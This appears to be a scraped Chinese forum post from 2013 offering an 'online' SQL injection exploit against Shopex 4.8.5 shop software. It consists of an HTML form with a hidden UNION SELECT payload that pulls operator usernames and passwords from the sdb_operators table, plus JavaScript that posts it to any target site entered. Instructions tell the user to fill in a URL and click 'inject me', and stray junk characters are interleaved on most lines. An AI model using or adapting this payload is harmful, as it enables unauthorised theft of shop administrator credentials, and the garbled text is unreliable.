<center>
" a3 x/ T6 H: A# U: N; ]) R<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>+ O, g3 o+ a3 ~( f
<form action="" method="post" name="submit_url">
) b0 W: u; W( v; G7 m7 l网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
{+ }' h- V" J8 Q5 J7 J<input type="hidden" name="goods[goods_id]" value="3">' _8 w" I9 L6 N6 ~" a: L
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
; S5 n& l `% [+ S<input type="submit" value="给我注入" onclick=fsubmit()>
* ~: |, w. N1 F$ b2 C4 p</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
7 g* _1 y8 M+ V9 ?/ A4 r7 k8 E0 t5 z7 v, K/ V0 O7 n7 A! k! `
<script> 7 R$ Z: B4 S/ s$ a) [1 l! B
function fsubmit(){ , o: A/ J5 F* |! B2 N0 i6 n
form = document.forms[0];
- t/ c, D+ i* h$ Vform.action = form.url.value+'/?product-gnotify';
( w" n* _; e ]9 Q% o+ Y# r) iform.submit();
. s- S0 `& H. J; @9 _} & T3 |- Z; }( Q
</script>
" c. g! Z. m& l) c& G& p# @$ X |
发表于 2013-1-23 09:20:52
收藏
支持
反对